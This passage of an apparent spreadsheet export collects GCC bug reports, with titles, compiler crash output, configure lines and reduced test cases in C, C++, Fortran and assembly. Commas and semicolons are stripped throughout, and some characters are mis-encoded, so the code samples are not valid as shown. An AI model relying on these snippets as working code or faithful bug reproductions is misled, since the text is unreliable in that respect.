il\Session.java:591)
   at __ZN5javax4mail7Session12getTransportEPN4java4lang6StringE (C:\Temp\foo\ja
vax\mail\Session.java:576)
   at __ZN4Send4mainEP6JArrayIPN4java4lang6StringEE (C:\Temp\foo\Send.java:44)
   at _main (c:\temp\cceEaaaa.i:11)</t>
  </si>
  <si>
    <t>GCC-18925</t>
  </si>
  <si>
    <t>[4.0 regression] Invalid gprel relocation in PIC</t>
  </si>
  <si>
    <t>$ cat gprel.cc 
class __attribute__ ((visibility(default))) Type 
{ 
 private: 
  static long _staticTypeCount 
 public: 
  Type() { _staticTypeCount++ } 
  ~Type() 
} 
long Type::_staticTypeCount = 0 
Type::~Type() 
{ 
 _staticTypeCount-- 
} 
$ gcc -fPIC -fvisibility=hidden -S gprel.cc 
$ grep _staticTypeCount gprel.s 
	.global _ZN4Type16_staticTypeCountE# 
	.type	_ZN4Type16_staticTypeCountE# @object 
	.size	_ZN4Type16_staticTypeCountE# 8 
_ZN4Type16_staticTypeCountE: 
	addl r14 = @gprel(_ZN4Type16_staticTypeCountE#) gp 
	addl r14 = @gprel(_ZN4Type16_staticTypeCountE#) gp 
	addl r14 = @gprel(_ZN4Type16_staticTypeCountE#) gp 
	addl r14 = @gprel(_ZN4Type16_staticTypeCountE#) gp</t>
  </si>
  <si>
    <t>GCC-52464</t>
  </si>
  <si>
    <t>When I compile my source codes with -O3 option the compiler fails. This does not occur if I use -O2</t>
  </si>
  <si>
    <t>I attached my software package in the attachment. You just need to type 
make rsem-parse-alignments to trigger the bug. Thanks!
$ g++ -v -save-temps -Wall -O3 -ffast-math -c -I. parseIt.cpp
Using built-in specs.
COLLECT_GCC=g++
COLLECT_LTO_WRAPPER=/usr/lib/gcc/i686-pc-cygwin/4.5.3/lto-wrapper.exe
Target: i686-pc-cygwin
Configured with: /gnu/gcc/releases/respins/4.5.3-3/gcc4-4.5.3-3/src/gcc-4.5.3/configure --srcdir=/gnu/gcc/releases/respins/4.5.3-3/gcc4-4.5.3-3/src/gcc-4.5.3 --prefix=/usr --exec-prefix=/usr --bindir=/usr/bin --sbindir=/usr/sbin --libexecdir=/usr/lib --datadir=/usr/share --localstatedir=/var --sysconfdir=/etc --datarootdir=/usr/share --docdir=/usr/share/doc/gcc4 -C --datadir=/usr/share --infodir=/usr/share/info --mandir=/usr/share/man -v --with-gmp=/usr --with-mpfr=/usr --enable-bootstrap --enable-version-specific-runtime-libs --libexecdir=/usr/lib --enable-static --enable-shared --enable-shared-libgcc --disable-__cxa_atexit --with-gnu-ld --with-gnu-as --with-dwarf2 --disable-sjlj-exceptions --enable-languages=adacc++fortranjavaltoobjcobj-c++ --enable-graphite --enable-lto --enable-java-awt=gtk --disable-symvers --enable-libjava --program-suffix=-4 --enable-libgomp --enable-libssp --enable-libada --enable-threads=posix --with-arch=i686 --with-tune=generic --enable-libgcj-sublibs CC=gcc-4 CXX=g++-4 CC_FOR_TARGET=gcc-4 CXX_FOR_TARGET=g++-4 GNATMAKE_FOR_TARGET=gnatmake GNATBIND_FOR_TARGET=gnatbind --with-ecj-jar=/usr/share/java/ecj.jar
Thread model: posix
gcc version 4.5.3 (GCC)
COLLECT_GCC_OPTIONS='-v' '-save-temps' '-Wall' '-O3' '-ffast-math' '-c' '-I.' '-shared-libgcc' '-mtune=generic' '-march=i686'
 /usr/lib/gcc/i686-pc-cygwin/4.5.3/cc1plus.exe -E -quiet -v -I. -D__CYGWIN32__ -D__CYGWIN__ -Dunix -D__unix__ -D__unix -idirafter /usr/lib/gcc/i686-pc-cygwin/4.5.3/../../../../include/w32api -idirafter /usr/lib/gcc/i686-pc-cygwin/4.5.3/../../../../i686-pc-cygwin/lib/../../include/w32api parseIt.cpp -mtune=generic -march=i686 -Wall -ffast-math -O3 -fpch-preprocess -o parseIt.ii
ignoring nonexistent directory /usr/local/include
ignoring nonexistent directory /usr/lib/gcc/i686-pc-cygwin/4.5.3/../../../../i686-pc-cygwin/include
ignoring duplicate directory /usr/lib/gcc/i686-pc-cygwin/4.5.3/../../../../i686-pc-cygwin/lib/../../include/w32api
#include ... search starts here:
#include  search starts here:
 .
 /usr/lib/gcc/i686-pc-cygwin/4.5.3/include/c++
 /usr/lib/gcc/i686-pc-cygwin/4.5.3/include/c++/i686-pc-cygwin
 /usr/lib/gcc/i686-pc-cygwin/4.5.3/include/c++/backward
 /usr/lib/gcc/i686-pc-cygwin/4.5.3/include
 /usr/lib/gcc/i686-pc-cygwin/4.5.3/include-fixed
 /usr/include
 /usr/lib/gcc/i686-pc-cygwin/4.5.3/../../../../include/w32api
End of search list.
COLLECT_GCC_OPTIONS='-v' '-save-temps' '-Wall' '-O3' '-ffast-math' '-c' '-I.' '-shared-libgcc' '-mtune=generic' '-march=i686'
 /usr/lib/gcc/i686-pc-cygwin/4.5.3/cc1plus.exe -fpreprocessed parseIt.ii -quiet -dumpbase parseIt.cpp -mtune=generic -march=i686 -auxbase parseIt -O3 -Wall -version -ffast-math -o parseIt.s
GNU C++ (GCC) version 4.5.3 (i686-pc-cygwin)
        compiled by GNU C version 4.5.3 GMP version 4.3.2 MPFR version 3.0.1-p4 MPC version 0.8
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
GNU C++ (GCC) version 4.5.3 (i686-pc-cygwin)
        compiled by GNU C version 4.5.3 GMP version 4.3.2 MPFR version 3.0.1-p4 MPC version 0.8
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
Compiler executable checksum: 2eb50487139b9f2ceb9af473175cad84
In file included from parseIt.cpp:9:0:
/usr/lib/gcc/i686-pc-cygwin/4.5.3/include/c++/fstream: In constructor â€˜std::basic_ofstream::basic_ofstream(const char* std::ios_base::openmode) [with _CharT = char _Traits = std::char_traits std::ios_base::openmode = std::_Ios_Openmode]â€™:
/usr/lib/gcc/i686-pc-cygwin/4.5.3/include/c++/fstream:701:4: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>bli</t>
  </si>
  <si>
    <t>GCC-20598</t>
  </si>
  <si>
    <t>[4.1 regression] gcc.c-torture/unsorted/uuarg.c  -O3</t>
  </si>
  <si>
    <t>For both cris-axis-elf and mmix-knuth-mmixware (likely most architectures
seemingly also i686-pc-linux-gnu (FC3) in
)
I see these failures with LAST_UPDATED Tue Mar 22 22:01:30 UTC 2005 which
is a regression since LAST_UPDATED Tue Mar 22 13:19:55 UTC 2005:
FAIL: gcc.c-torture/unsorted/uuarg.c  -O3 -fomit-frame-pointer
FAIL: gcc.c-torture/unsorted/uuarg.c  -O3 -g
In gcc.log I see (cutnpasted):
/home/hp/combined/combined/gcc/testsuite/gcc.c-torture/unsorted/uuarg.c:4:
internal compiler error: in cgraph_mark_inline_edge a\
t cgraphunit.c:1127^M</t>
  </si>
  <si>
    <t>GCC-42833</t>
  </si>
  <si>
    <t>[4.5 Regression] sra miscompiles qemu</t>
  </si>
  <si>
    <t>The reduced test case compiles down to 
        xor   %eax%eax
        ret
which comes from an invalid transformation in .030t.esra
  conv_u.v = vdest
  res_115 = conv_u.i
-&gt;
  D.2888_153 = VIEW_CONVERT_EXPR(vdest)
  vdest.v1 = vdest$v1_154
  vdest.v2 = vdest$v2_152
  vdest.v3 = vdest$v3_151
  vdest.v4 = vdest$v4_150
  conv_u$i_171 = D.2888_153
Note in particular that the components of vdest are stored after
we've done the view_convert.</t>
  </si>
  <si>
    <t>GCC-2116</t>
  </si>
  <si>
    <t>Internal Compiler Error in find_reloads</t>
  </si>
  <si>
    <t>A make bootstrap terminates with the following error message:
/usr/src/gnu/gcc-local/gcc/simplify-rtx.c: In function `simplify_plus_minus':
/usr/src/gnu/gcc-local/gcc/simplify-rtx.c:1675: Internal compiler error in find_
reloads at reload.c:4157
Please submit a full bug report with preprocessed source if appropriate.
See  for instructions.
Release:
2.97 20010205 (experimental)
Environment:
System: NetBSD gateway.beware.dropbear.id.au 1.5_ALPHA NetBSD 1.5_ALPHA (SIBYL) #0: Sun Aug 13 15:28:38 CST 2000 ian@sibyl.beware.dropbear.id.au:/usr3/netbsd-src/bsrc/sys/arch/pc532/compile/SIBYL pc532
host: ns32k-pc532-netbsd
build: ns32k-pc532-netbsd
target: ns32k-pc532-netbsd
configured with:  : (reconfigured)  : (reconfigured)  : (reconfigured)  : (reconfigured)  : (reconfigured)  : (reconfigured)
How-To-Repeat:
cc1 -O2 simplify-rtx.i -o /dev/null</t>
  </si>
  <si>
    <t>GCC-3603</t>
  </si>
  <si>
    <t>reports No Input File</t>
  </si>
  <si>
    <t>when executing the following command line:
C:\Program Files\PRC-Tools\H-i586-cygwin32\bin\m68k-palmos-gcc -Os -palmos3.5 -c GotoForm.c -o GotoForm.o
the following result is received:
Turbo C++ Preprocessor Version 3.00 Copyright (c) 1992 Borland International
Error: No file names given
( main] C:\PROGRAM FILES\PRC-TOOLS\H-I586-CYGWIN32\BIN\M68K-PALMOS-GCC.EXE 1000[
0) proc_subproc: invalid process handle 0x70.  pid 1001 win pid -1943687
M68K-P~9.EXE: Internal compiler error in `execute' at ../../../prc-tools-2.0/gc
c/gcc/gcc.c:2329
.Please submit a full bug report
.See  for instructions
Release:
)gcc version 2.95.2-kgpd 19991024 (release
How-To-Repeat:
I dont know Whenever I ran the compiler I got this message.</t>
  </si>
  <si>
    <t>some--one</t>
  </si>
  <si>
    <t>GCC-66412</t>
  </si>
  <si>
    <t>[5/6 Regression] ICE on valid code at -O2 and -O3 with -g enabled in simplify_subreg at simplify-rtx.c:5748</t>
  </si>
  <si>
    <t>The following code causes an ICE when compiled with the current gcc trunk at -O2 and -O3 with -g enabled on x86_64-linux-gnu in both 32-bit and 64-bit modes.
This is a regression from 4.9.x.
$ gcc-trunk -v
Using built-in specs.
COLLECT_GCC=gcc-trunk
COLLECT_LTO_WRAPPER=/usr/local/gcc-trunk/libexec/gcc/x86_64-unknown-linux-gnu/6.0.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ../gcc-trunk/configure --prefix=/usr/local/gcc-trunk --enable-languages=cc++ --disable-werror --enable-multilib
Thread model: posix
gcc version 6.0.0 20150603 (experimental) [trunk revision 224056] (GCC) 
$ 
$ gcc-trunk -O2 -c small.c
$ gcc-trunk -Os -g -c small.c
$ gcc-4.9.2 -O2 -g -c small.c
$ 
$ gcc-trunk -O2 -g -c small.c
small.c: In function â€˜fn1â€™:
small.c:12:1: internal compiler error: in simplify_subreg at simplify-rtx.c:5743
 }
 ^
0xae6809 simplify_subreg(machine_mode rtx_def* machine_mode unsigned int)
	../../gcc-trunk/gcc/simplify-rtx.c:5742
0xae6bf9 simplify_gen_subreg(machine_mode rtx_def* machine_mode unsigned int)
	../../gcc-trunk/gcc/simplify-rtx.c:5962
0xae9176 simplify_replace_fn_rtx(rtx_def* rtx_def const* rtx_def* (*)(rtx_def* rtx_def const* void*) void*)
	../../gcc-trunk/gcc/simplify-rtx.c:524
0xd9b7ef propagate_for_debug(rtx_insn* rtx_insn* rtx_def* rtx_def* basic_block_def*)
	../../gcc-trunk/gcc/valtrack.c:210
0x106d801 try_combine
	../../gcc-trunk/gcc/combine.c:4399
0x1071301 combine_instructions
	../../gcc-trunk/gcc/combine.c:1324
0x1071301 rest_of_handle_combine
	../../gcc-trunk/gcc/combine.c:14326
0x1071301 execute
	../../gcc-trunk/gcc/combine.c:14369
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
$ 
-----------------------------------------
int a b c d
void
fn1 ()
{
  short e
  for (c = 0 c &lt; 1 c++)
    d = 0
  unsigned short g = ((a == 0) ^ d) % 8
  e = g &lt;&lt; 1
  b = e 
}</t>
  </si>
  <si>
    <t>GCC-46932</t>
  </si>
  <si>
    <t>Inefficient code sequence to access local variable</t>
  </si>
  <si>
    <t>Compile the following code with options -march=armv7-a -mthumb -O2
extern void foo(char*)
void t01(char t)
{
  char c = t
  foo(
}
gcc4.6 generates:
t01:
	push	{lr}
	sub	sp sp #12
	add	r3 sp #8       // A
	strb	r0 [r3 #-1]!   // B
	mov	r0 r3           // C
	bl	foo
	add	sp sp #12
	pop	{pc}
Code sequence ABC can be replaced by
        strb    r0 [sp #7]
        add     r0 sp #7      
Which may be faster. If we allocate the variable c at the boundary of a word(4 bytes aligned) the code sequence would be:
        strb    r0 [sp #4]
        add     r0 sp #4
which is shorter in code size because add     r0 sp #4 can be encode into 16 bits.
When compiled to ARM instructions and/or -Os it has the same problem.</t>
  </si>
  <si>
    <t>GCC-82003</t>
  </si>
  <si>
    <t>[5 Regression] Segmentation fault building kmymoney git sources.</t>
  </si>
  <si>
    <t>Created attachment 42056
segmentation fault.
Hi
As reported here:
https://bugs.gentoo.org/show_bug.cgi?id=627814
And here:
https://bugs.kde.org/show_bug.cgi?id=384072
Taking kmymoney git sources and building it using:
$ gcc -v
Using built-in specs.
COLLECT_GCC=/usr/x86_64-pc-linux-gnu/gcc-bin/5.4.0/gcc
COLLECT_LTO_WRAPPER=/usr/libexec/gcc/x86_64-pc-linux-gnu/5.4.0/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: /var/tmp/portage/sys-devel/gcc-5.4.0-r3/work/gcc-5.4.0/configure --host=x86_64-pc-linux-gnu --build=x86_64-pc-linux-gnu --prefix=/usr --bindir=/usr/x86_64-pc-linux-gnu/gcc-bin/5.4.0 --includedir=/usr/lib/gcc/x86_64-pc-linux-gnu/5.4.0/include --datadir=/usr/share/gcc-data/x86_64-pc-linux-gnu/5.4.0 --mandir=/usr/share/gcc-data/x86_64-pc-linux-gnu/5.4.0/man --infodir=/usr/share/gcc-data/x86_64-pc-linux-gnu/5.4.0/info --with-gxx-include-dir=/usr/lib/gcc/x86_64-pc-linux-gnu/5.4.0/include/g++-v5 --with-python-dir=/share/gcc-data/x86_64-pc-linux-gnu/5.4.0/python --enable-languages=cc++fortran --enable-obsolete --enable-secureplt --disable-werror --with-system-zlib --enable-nls --without-included-gettext --enable-checking=release --with-bugurl=https://bugs.gentoo.org/ --with-pkgversion='Gentoo 5.4.0-r3 p1.3 pie-0.6.5' --enable-libstdcxx-time --enable-shared --enable-threads=posix --enable-__cxa_atexit --enable-clocale=gnu --enable-multilib --with-multilib-list=m32m64 --disable-altivec --disable-fixed-point --enable-targets=all --disable-libgcj --enable-libgomp --disable-libmudflap --disable-libssp --disable-libcilkrts --disable-libmpx --enable-vtable-verify --enable-libvtv --enable-lto --without-isl --enable-libsanitizer
Thread model: posix
gcc version 5.4.0 (Gentoo 5.4.0-r3 p1.3 pie-0.6.5)
Triggers a segmentation fault shown in the attachment. The code in question seems to be:
      auto removeCellFromRow = [=](auto &amp;&amp;self QStandardItem *item) -&gt; bool {
        for(auto j = 0 j rowCount() ++j) {
          auto childItem = item-&gt;child(j)
          if (childItem-&gt;hasChildren())
            self(self childItem)
          childItem-&gt;removeColumn(ixCol)
        }
        return true
      }
And Gentoo community reports gcc 6.4 builds it and KDE community says clang is able too. My wonder is if this is a bug or a feature not yet implemented in the version. If it's the previous it would be awesome to get the fix backported otherwise please let me know to consider to jump to the new version.
Thanks!
JosÃ©</t>
  </si>
  <si>
    <t>koalinux</t>
  </si>
  <si>
    <t>GCC-11736</t>
  </si>
  <si>
    <t>Stackpointer messed up on SuperH</t>
  </si>
  <si>
    <t>When a function with 5 arguments is called in both branches of a
conditional and only the last argument differs the code to push that
last argument on the stack gets confused.  Example function:
---8&lt;--- r15bug.c ---8&lt;---
extern void bar(int int int int int) 
void foo(int a) 
{ 
  if (a) 
    bar( 0 0 0 0 1 ) 
  else 
    bar( 0 0 0 0 0 ) 
} 
---8&lt;---
Compiling with `sh-elf-gcc -O1 -S r15bug.c' I get this:
---8&lt;--- r15bug.s ---8&lt;---
        .file   r15bug.c 
        .text 
        .text 
        .align 1 
        .global _foo 
        .type   _foo @function 
_foo: 
        mov.l   r14@-r15 
        sts.l   pr@-r15 
        mov     r15r14 
        tst     r4r4 
        add     #-4r15   ! A
        mov     #1r1 
        bf      .L4 
        add     #-4r15   ! B
        mov     #0r1 
.L4: 
        mov.l   r1@r15 
        mov     #0r4 
        mov     #0r5 
        mov     #0r6 
        mov.l   .L5r1 
        jsr     @r1 
        mov     #0r7
        add     #4r15 
        mov     r14r15 
        lds.l   @r15+pr 
        rts      
        mov.l   @r15+r14 
.L6: 
        .align 2 
.L5: 
        .long   _bar 
        .size   _foo .-_foo 
        .ident  GCC: (GNU) 3.3 
---8&lt;---
Space for the fifth argument is reserved on the stack by the
instruction I have marked as A.  However if the else-branch is
taken the stackpointer is decremented _again_ at B.  This
decrementation is never restored and it is only due to the
restoration of r15 from r14 that the function works at all.  With
-fomit-frame-pointer it will crash.</t>
  </si>
  <si>
    <t>GCC-25184</t>
  </si>
  <si>
    <t>[3.4 Regression] another wrong will never be executed warning with switch - case</t>
  </si>
  <si>
    <t>With the attached code I get
C:\Dev-Cpp\Projects\test-stlport\main_19.cpp In function `void test_19(long unsigned int)': 
8 C:\Dev-Cpp\Projects\test-stlport\main_19.cpp [Warning] will never be executed 
8 C:\Dev-Cpp\Projects\test-stlport\main_19.cpp [Warning] will never be executed
and when I uncomment the i = 1 I get
C:\Dev-Cpp\Projects\test-stlport\main_19.cpp In function `void test_19(long unsigned int)': 
10 C:\Dev-Cpp\Projects\test-stlport\main_19.cpp [Warning] will never be executed 
void test_19(unsigned long ul_reason_for_call)
{ 
  	int i = 0
	switch (ul_reason_for_call)
	{
		case 1:			 
			//i = 1
			break
		case 2:
			break
		case 3:
			break
		case 4:
			break
    }
}
Happend when compiled C and C++.
C:\MinGW_3.4.4\bin&gt;gcc -v
Reading specs from ../lib/gcc/mingw32/3.4.4/specs
Configured with: ../gcc/configure --with-gcc --with-gnu-ld --with-gnu-as --host=
mingw32 --target=mingw32 --prefix=/mingw --enable-threads --disable-nls --enable
-languages=cc++f77adaobjcjava --disable-win32-registry --disable-shared --e
nable-sjlj-exceptions --enable-libgcj --disable-java-awt --without-x --enable-ja
va-gc=boehm --disable-libgcj-debug --enable-interpreter --enable-hash-synchroniz
ation --enable-libstdcxx-debug
Thread model: win32
gcc version 3.4.4 (mingw special)</t>
  </si>
  <si>
    <t>oliverst</t>
  </si>
  <si>
    <t>GCC-69529</t>
  </si>
  <si>
    <t>s/390: special_functions/02_assoc_legendre failure</t>
  </si>
  <si>
    <t>The assoc_legendre function exceeds the allowed tolerance on s390x for data033[19]:
  { 2.5643395957697341e+17 100 10 
	  0.89999999999999991 }
The actual deviation is 2.75283e-13 while the allowed tolerance is 2.5e-13.  What should I do with this?</t>
  </si>
  <si>
    <t>GCC-39464</t>
  </si>
  <si>
    <t>[4.6/4.7/4.8 Regression] Attribute may_alias causes invalid warning</t>
  </si>
  <si>
    <t>typedef int myint __attribute__((may_alias))
int foo(void *p)
{
  myint *q = (int *)p
  return *q
}
gcc -S t.c -Wall -O2
t.c: In function â€˜fooâ€™:
t.c:5: warning: pointer targets in initialization differ in signedness</t>
  </si>
  <si>
    <t>GCC-57602</t>
  </si>
  <si>
    <t>[4.9 Regression] Runfails for several C/C++ benchmarks from spec2000 for i686 with -flto after r199422</t>
  </si>
  <si>
    <t>For instance 164.gzip has Segmentation fault. (tried on trunk revision 200055)
Compiler options
-m32 -Ofast -flto -funroll-loops -msse2 -mfpmath=sse.</t>
  </si>
  <si>
    <t>GCC-65750</t>
  </si>
  <si>
    <t>[4.9/5 Regression] misinterpret in a virtual member function with a C++11 style function signature</t>
  </si>
  <si>
    <t>Repro:
#include 
class a
{
  virtual auto f( std::function ) -&gt; void
  virtual auto g( std::function void &gt; ) -&gt; void
}
auto main() -&gt; int { }
Result 1 ( g++-5.0.0 4.9.2 and &gt;= 4.9.0 ):
prog.cc:6:16: error: implicit templates may not be 'virtual'
   virtual auto g( std::function void &gt; ) -&gt; void
Result 2 ( g++-4.8.2 g++4.7.3 ):
(no errors compile is succeed.)
Result 3 ( clang++-3.7.0 3.6.0 3.5.0 and 3.4 )
(no errors compile is succeed.)</t>
  </si>
  <si>
    <t>usagi</t>
  </si>
  <si>
    <t>GCC-55172</t>
  </si>
  <si>
    <t>[4.7 Regression] [OOP] gfc_variable_attr(): Bad array reference in SELECT TYPE</t>
  </si>
  <si>
    <t>The following test case produces and ICE with gfortran 4.8 (r193051):
module gn
  type :: ncb
  end type ncb
  type public :: tn
     class(ncb) allocatable dimension(:) :: cb
  end type tn
contains
  integer function name(self)
    implicit none
    class (tn) intent(in) :: self
    select type (component =&gt; self%cb(i))
    end select
  end function name
end module gn
$ gfortran -v
Using built-in specs.
COLLECT_GCC=gfortran
COLLECT_LTO_WRAPPER=/home/abenson/Galacticus/Tools/libexec/gcc/x86_64-unknown-
linux-gnu/4.8.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ../gcc-trunk/configure --
prefix=/home/abenson/Galacticus/Tools --enable-languages=cc++fortran --
disable-multilib --with-gmp=/home/abenson/Galacticus/Tools
Thread model: posix
gcc version 4.8.0 20121031 (experimental) (GCC) 
$ gfortran -c bug4.F90 -o bug4.o
bug4.F90:14.13:
end module gn
             1   
Internal Error at (1):
gfc_variable_attr(): Bad array reference
The code is invalid because the name function contains implicit none but 
the variable i used in:
    select type (component =&gt; self%cb(i))
is not explicitly defined. If I remove the implicit none or explicitly 
define i the ICE goes away.
(Reported by Janus at http://gcc.gnu.org/ml/fortran/2012-11/msg00005.html): With 4.7 the ICE also occurs but only after the correct error message:
    select type (component =&gt; self%cb(i))
                                       1
Error: Symbol 'i' at (1) has no IMPLICIT type</t>
  </si>
  <si>
    <t>GCC-61459</t>
  </si>
  <si>
    <t>[4.8/4.9/4.10 Regression] segfault when assigning to allocatable function result from matmul result</t>
  </si>
  <si>
    <t>Created attachment 32913
Output for gfortran -v -Wall -Wextra -std=f2003 (compiler version 4.7.2)
In a function with an allocatable array as result variable an assigment statement with the result variable on the LHS segfaults when the value
assigned is generated by matmul.  This behavior is observed with
versions 4.7.2 4.8.0 and 4.9.0.  With version 4.6.2 an ICE occurs
at the same assignment statement.  Similar code worked with version
4.4.5 so there appears to be a regression.
The source code below illustrates the problem and shows a workaround.
Code like the example which worked with version 4.4.5 started failing when
compiled after an OS upgrade (Debian) installed 4.7.2.  Coincidentally
colleagues using the same code on OS X upgraded from 4.4.x to gfortran 4.8.0
and 4.9.0 and likewise encountered segfaults with new compilations.
Since the segfault occurs with multiple versions under two operating systems
I suspect that the problem is not due to something that Debian or whoever
packaged the Apple version did.
gdb reports that the segfault is detected within matmul.
No problem if the result variable is not allocatable.
I tried some other intrinsics in place of matmul no problem.
With -Wall -Wextra -std=f2003 there are no warnings errors or any other
output from the compiler.
(In our production code the arguments to matmul are a slice of an
allocatable integer array and an allocatable real(kind=real64) array
but the problem occurs without these embellishments as the example
code shows.)
Example source code:
module a
   implicit none
   private
   public :: f_segfault f_workaround
   integer dimension(22) :: b = reshape([1-111][22])
contains
   function f_segfault(x)
      real dimension(:) allocatable :: f_segfault
      real dimension(:) intent(in)  :: x
      allocate(f_segfault(2))
      f_segfault = matmul(bx)
   end function f_segfault
   function f_workaround(x)
      real dimension(:) allocatable :: f_workaround
      real dimension(:) intent(in)  :: x
      real dimension(:) allocatable :: tmp
      allocate(f_workaround(2)tmp(2))
      tmp = matmul(bx)
      f_workaround = tmp
   end function f_workaround
end module a
program main
   use a
   implicit none
   real dimension(2) :: x = 1.0
   print * f_workaround(x) = f_workaround(x)
   print * f_segfault(x) = f_segfault(x)
end program main</t>
  </si>
  <si>
    <t>johnww</t>
  </si>
  <si>
    <t>GCC-36438</t>
  </si>
  <si>
    <t>gcc ICE compiling code with mmx builtin</t>
  </si>
  <si>
    <t>Compiling the following code with latest compiler got ice:
f.i: In function 'void foo(int __vector__* int)':
f.i:33: internal compiler error: in trunc_int_for_mode at explow.c:55
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
// f.i:
typedef unsigned short int16
typedef int __m64 __attribute__ ((__vector_size__ (8) __may_alias__))
typedef long long __v1di __attribute__ ((__vector_size__ (8)))
extern __inline __m64 __attribute__((__gnu_inline__ __always_inline__ __artificial__))
_mm_slli_si64 (__m64 __m int __count)
{
  return (__m64) __builtin_ia32_psllqi ((__v1di)__m __count)
}
extern __inline __m64 __attribute__((__gnu_inline__ __always_inline__ __artificial__))
_mm_set_pi16 (short __w3 short __w2 short __w1 short __w0)
{
  return (__m64) __builtin_ia32_vec_init_v4hi (__w0 __w1 __w2 __w3)
}
inline __m64 __attribute__((__always_inline__)) SetS16(int16 a int16 b int16 c int16 d) {
  return _mm_set_pi16(d c b a)
}
void foo(__m64* dest int n) {
  __m64 mask = SetS16(0x00FF 0xFF00 0x0000 0x00FF)
  for ( int i = 0  i &lt; n ++i ) {
    mask = _mm_slli_si64(mask 8)
    mask = _mm_slli_si64(mask 8)
    *dest = mask
    ++dest
  }
  __builtin_ia32_emms ()
}</t>
  </si>
  <si>
    <t>GCC-22149</t>
  </si>
  <si>
    <t>func pointer non-type template parm invalid access control</t>
  </si>
  <si>
    <t>I notice that program1 (the 1st program attached below) fails to compile but
very similar programs 2 and 3 (attached further below) do. The only difference
being related to how the non-type template parameter is declared void (*FOOBAR)
() vs void FOOBAR () vs void (&amp;FOOBAR) (). 
/cygdrive/d/users/hill/tmp/daTest$ g++ cat.cpp
cat.cpp: In constructor `foo::foo() [with void (*FOOBAR)() = bar::foobar
]':
cat.cpp:12:   instantiated from here
cat.cpp:15: error: `static void bar::foobar()' is private
cat.cpp:7: error: within this context
---------program1--snip--snip---------
template 
class foo {
public:
    foo () { (*FOOBAR) () }
}
class bar {
public:
    bar () { foo  tmp }
private:
    static void foobar ()
    {
    }
}
main ()
{
    bar b
}
---------program2--snip--snip---------
template 
class foo {
public:
    foo () { FOOBAR () }
}
class bar {
public:
    bar () { foo  tmp }
private:
    static void foobar ()
    {
    }
}
main ()
{
    bar b
}
--------program3---snip--snip---------
template 
class foo {
public:
    foo () { FOOBAR () }
}
class bar {
public:
    bar () { foo  tmp }
private:
    static void foobar ()
    {
    }
}
main ()
{
    bar b
}
-----------snip--snip---------
/cygdrive/d/users/hill/tmp/daTest$ g++ -v
Reading specs from /usr/lib/gcc/i686-pc-cygwin/3.4.4/specs
Configured with: /gcc/gcc-3.4.4/gcc-3.4.4-1/configure --verbose --prefix=/usr --
exec-prefix=/usr --sysconfdir=/etc --libdir=/usr/lib --libexecdir=/usr/lib --man
dir=/usr/share/man --infodir=/usr/share/info --enable-languages=cadac++df77
javaobjc --enable-nls --without-included-gettext --enable-version-specific-runt
ime-libs --without-x --enable-libgcj --disable-java-awt --with-system-zlib --ena
ble-interpreter --disable-libgcj-debug --enable-threads=posix --enable-java-gc=b
oehm --disable-win32-registry --enable-sjlj-exceptions --enable-hash-synchroniza
tion --enable-libstdcxx-debug : (reconfigured)
Thread model: posix
gcc version 3.4.4 (cygming special) (gdc 0.12 using dmd 0.125)</t>
  </si>
  <si>
    <t>johill</t>
  </si>
  <si>
    <t>GCC-65798</t>
  </si>
  <si>
    <t>runtime.Caller returns ok=true when return data is invalid</t>
  </si>
  <si>
    <t>Created attachment 35347
Don't return ok=true from runtime.Caller if the pc is 0 or the filename has 0 len.
This came from a user trying to build Docker on Fedora 22 using gccgo.  The they found when calling runtime.Caller the return value for ok could be true even though the other returned values could be invalid.  Because ok was true they assumed the data was valid and tried to use those return values from runtime.Caller to pass onto runtime.FuncForPC which then resulted in the signal 11 displayed below.
The failure occurs on every platform they tried to use with gccgo.  Here is the original information:
------------------------------------
Description of problem:
docker using gcc-go crashes
Version-Release number of selected component (if applicable):
gcc-5.0.1-0.1.fc22
How reproducible:
Always(reproduced on x86_64 ppc64le s390x but expecting ppc64 too)
Steps to Reproduce:
1.install docker from https://repos.fedorapeople.org/repos/jcajka/docker-gccgo/ (ppc64(le) s390x) or https://copr.fedoraproject.org/coprs/jcajka/docker-gccgo/ (x86_64) 
2.systemctl start docker
3.mkdir /root/dir
4.chcon -Rt svirt_sandbox_file_t /root/dir/ (just in case)
5.1 for x86: 
  docker run fedora -itv /root/dir/:/root/dir/ /bin/bash 
5.2 for ppc64(le)s390x(replace arch in docker.io/jcajka/fedora22-...):
  docker run docker.io/jcajka/fedora22-ppc64 -itv /root/dir/:/root/dir/ /bin/bash
Actual results
on ppc64le/x86:
docker run docker.io/jcajka/fedora22-ppc64le -itv /root/dir/:/root/dir/ /bin/bash
panic: runtime error: invalid memory address or nil pointer dereference
on ppc64le: [signal 0xb code=0x1 addr=0x8]
on x86_64:  [signal 0xb code=0x1 addr=0x0]
goroutine 16 [running]:
github_com_docker_libcontainer_stacktrace.NewFrame
	/builddir/build/BUILD/docker-1dcc59a0b40f7d29ab2e0b8fdeb0adf537dbcbaf/vendor/src/github.com/docker/libcontainer/stacktrace/frame.go:12
github_com_docker_libcontainer_stacktrace.Capture
	/builddir/build/BUILD/docker-1dcc59a0b40f7d29ab2e0b8fdeb0adf537dbcbaf/vendor/src/github.com/docker/libcontainer/stacktrace/capture.go:18
libcontainer.newSystemError
	/builddir/build/BUILD/docker-1dcc59a0b40f7d29ab2e0b8fdeb0adf537dbcbaf/vendor/src/github.com/docker/libcontainer/generic_error.go:48
libcontainer.$nested4
	/builddir/build/BUILD/docker-1dcc59a0b40f7d29ab2e0b8fdeb0adf537dbcbaf/vendor/src/github.com/docker/libcontainer/factory_linux.go:212
github_com_docker_libcontainer.StartInitialization.pN43_github_com_docker_libcontainer.LinuxFactory
	/builddir/build/BUILD/docker-1dcc59a0b40f7d29ab2e0b8fdeb0adf537dbcbaf/vendor/src/github.com/docker/libcontainer/factory_linux.go:224
native.initializer
